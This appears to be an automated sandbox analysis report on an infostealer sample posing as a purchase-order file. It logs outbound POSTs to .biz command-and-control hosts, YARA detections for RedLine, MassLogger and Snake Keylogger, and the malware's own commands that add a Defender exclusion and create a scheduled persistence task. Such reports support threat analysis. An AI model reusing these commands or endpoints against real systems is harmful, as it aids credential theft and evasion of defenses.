Nov 22, 2024 18:57:01.500308037 CET	778	OUT	Data Raw: 1d 5d b9 fd 16 4f 89 d9 fe 02 00 00 15 c3 84 ae 7d 1d ee de 3f eb 39 86 2d 92 75 1f bf cf dd c9 c7 06 91 be 9f a7 d1 ca e3 a9 bd 43 26 d9 13 d7 62 88 af 88 d0 b4 ef 7a 11 b2 3a 64 da e1 2b e2 aa 8a 8a 3d f9 f2 b2 00 0c 3f 84 06 35 a0 54 89 d9 2a Data Ascii: ]O}?9-uC&bz:d+=?5Ty&Q/j~+_i_p<n~;jw5x.\9G2Dnc@pbw-M~qI]z.J`RGdQ*KOFh-m]WonR{\|'Oz:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49965	172.234.222.143	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:57:02.802057028 CET	347	OUT	POST /mhwavs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:57:02.802097082 CET	778	OUT	Data Raw: a5 2b 17 84 9e 61 51 85 fe 02 00 00 06 c7 81 9f 6b e8 62 74 d9 28 e4 1a ed c7 61 f4 b5 f8 fc 70 21 ff fd 6b 6e 73 70 39 a4 f6 b0 76 e1 4d 50 49 a7 a3 af 11 8d d0 a8 c6 4a 5b ce ec 8e 18 3a 7f 47 9b 44 45 7d e0 ce 2d f2 01 c9 26 f1 01 c5 c9 b7 d8 Data Ascii: +aQkbt(ap!knsp9vMPIJ[:GDE}-&@H~WQ[L3`h`'aCy4m >N{- a&oagw6!N. wE3QD+nC=od+vo%+kk+0kEy~{UNSy>0aT(D0q!.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49971	34.246.200.160	80	1716	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 18:57:04.871220112 CET	344	OUT	POST /ho HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 22, 2024 18:57:04.871248007 CET	778	OUT	Data Raw: 41 9d 8e db 05 08 6d 27 fe 02 00 00 79 5b fb e9 a6 f1 0f b9 c6 9c 46 fa 2c dc 8c cb c2 9a 38 a8 29 45 db 30 61 9c 93 a3 03 29 22 38 ae 15 41 64 fe 27 c7 2a a2 23 51 40 22 ec b6 09 65 07 9a 63 7e 07 6d e4 d8 e7 69 01 68 2a 56 a3 08 95 76 39 f8 4a Data Ascii: Am'y[F,8)E0a)"8Ad'#Q@"ec~mihVv9JG\j_QZ=S\Z^ r?B?B h@3*D=b@>NB1@4~sSzE)TsWn{@v@gURMk'vt+5hi
Nov 22, 2024 18:57:06.344959021 CET	408	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 17:57:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=31e4cc518641e053c0d572e33debcee2\|8.46.123.75\|1732298226\|1732298226\|0\|1\|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	104.21.67.152	443	4324	C:\Users\user\AppData\Local\Temp\server01.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 17:55:13 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-22 17:55:13 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 17:55:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 262022 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2B1Z70tY7ASNmYyVU2Yt3bkbT9O4Xk%2BbrpEsQYn4DR16w%2F1ftyWFKsQIND1d7Iundz2nzqZTh4oEod%2FvX4eCHmh3DXgyb39%2BQAEv9AsdMOplvRGoHR0kMrxfMVWZgy%2BFigERYJb4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6aca080b5a0f89-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1893644&cwnd=235&unsent_bytes=0&cid=f667429b980d98f8&ts=476&x=0"
2024-11-22 17:55:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Target ID:	0
Start time:	12:54:58
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Imagebase:	0x400000
File size:	1'851'904 bytes
MD5 hash:	33FFA6B9A3022156B4592E17F1A9A074
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:54:59
Start date:	22/11/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'290'240 bytes
MD5 hash:	C427B6CE66EA0E5D2D3325158244AE4D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:54:59
Start date:	22/11/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'225'728 bytes
MD5 hash:	DA0B96A9E5E0F99A5EF268C07A1A1025
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:55:00
Start date:	22/11/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:55:00
Start date:	22/11/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:55:00
Start date:	22/11/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:55:00
Start date:	22/11/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	C694BB2A60BDA8FD88F36DC094FF6DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:55:00
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Imagebase:	0x400000
File size:	1'851'904 bytes
MD5 hash:	33FFA6B9A3022156B4592E17F1A9A074
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:55:01
Start date:	22/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Imagebase:	0x40000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:55:02
Start date:	22/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	F691545D151C73AC2F1C8FC3F6553944
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:55:02
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Imagebase:	0x400000
File size:	1'851'904 bytes
MD5 hash:	33FFA6B9A3022156B4592E17F1A9A074
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:55:03
Start date:	22/11/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'356'800 bytes
MD5 hash:	27652B586B1E4F9793415650BFFAE22A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:55:04
Start date:	22/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Imagebase:	0x630000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:55:06
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:	0x170000
File size:	70'656 bytes
MD5 hash:	E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:55:06
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server01.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server01.exe"
Imagebase:	0xe40000
File size:	98'304 bytes
MD5 hash:	0CDBE0CD3CB5C2F0B2CB17E4417D43F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3330930022.0000000003263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:55:08
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:55:08
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x9e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:55:08
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:55:08
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:55:11
Start date:	22/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"
Imagebase:	0x7ff770950000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:55:11
Start date:	22/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:55:12
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Imagebase:	0x400000
File size:	1'851'904 bytes
MD5 hash:	33FFA6B9A3022156B4592E17F1A9A074
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:55:15
Start date:	22/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Imagebase:	0x4d0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:55:46
Start date:	22/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0xee0000
File size:	665'670'656 bytes
MD5 hash:	8EBEFAB8EF46B9960EDB099737B0E1ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	7.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	73

Executed Functions

Function 00ADCBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

d, xrefs: 00ADC294
w, xrefs: 00ADC289

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: a9b5586f743ab2a5f442b90dc72b4b484d8e006f201055584434a6c965c10bc3
Instruction ID: e3fb16a763e84a7fe94f2ec4fce012ba40afd1aa34601fe17cd547f9193d0d3b
Opcode Fuzzy Hash: a9b5586f743ab2a5f442b90dc72b4b484d8e006f201055584434a6c965c10bc3
Instruction Fuzzy Hash: 5BC13274968343EECA3557648C09BB67B346B61B30FCA0687F1578A3F3EB249D04D622

Function 0042B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction ID: e0f5de3d63888374dd379d58e7dc1cccdf18031ddaac7846d59f909699946da1
Opcode Fuzzy Hash: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction Fuzzy Hash: F3326175B022288BCB24DF55EC81AEAB7B5FF46314F5440DAE40AE7A81D7349D80CF96

Function 00403D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8

Part of subcall function 00406430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403DEE,004C1148,?,?,?,?,?,00403AA3,?), ref: 00406471

SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B28F4,00000010), ref: 00471CCE
SetCurrentDirectoryW.KERNEL32(?,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0049DAB4,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00403AA3), ref: 00471D90

Part of subcall function 00403E6E: GetSysColorBrush.USER32(0000000F), ref: 00403E79
Part of subcall function 00403E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
Part of subcall function 00403E6E: LoadIconW.USER32(00000063), ref: 00403E9E
Part of subcall function 00403E6E: LoadIconW.USER32(000000A4), ref: 00403EB0
Part of subcall function 00403E6E: LoadIconW.USER32(000000A2), ref: 00403EC2
Part of subcall function 00403E6E: RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724

Part of subcall function 00404FFC: _memset.LIBCMT ref: 00405022
Part of subcall function 00404FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004050CB

Strings

runas, xrefs: 00471D84
()K, xrefs: 00471D49
This is a third-party compiled AutoIt script., xrefs: 00471CC8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()K$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-361992462
Opcode ID: 7d89592413dc87b76cbc47995619ff8f5c7103c149ad73e2d280106dc8544858
Instruction ID: 8c2ea3201cdb187de0b382d93636e43dc28cc5d5927fe16ad7bbb767c2a6e17f
Opcode Fuzzy Hash: 7d89592413dc87b76cbc47995619ff8f5c7103c149ad73e2d280106dc8544858
Instruction Fuzzy Hash: 9B51D230E04248AACF11ABB5DC41EEE7B799B0A704F04817FF541762E2CE7C4A458B6D

Function 0041DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0041DDEC
GetCurrentProcess.KERNEL32(00000000,0049DC38,?,?), ref: 0041DEAC
GetNativeSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF1F
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF29
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF35

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

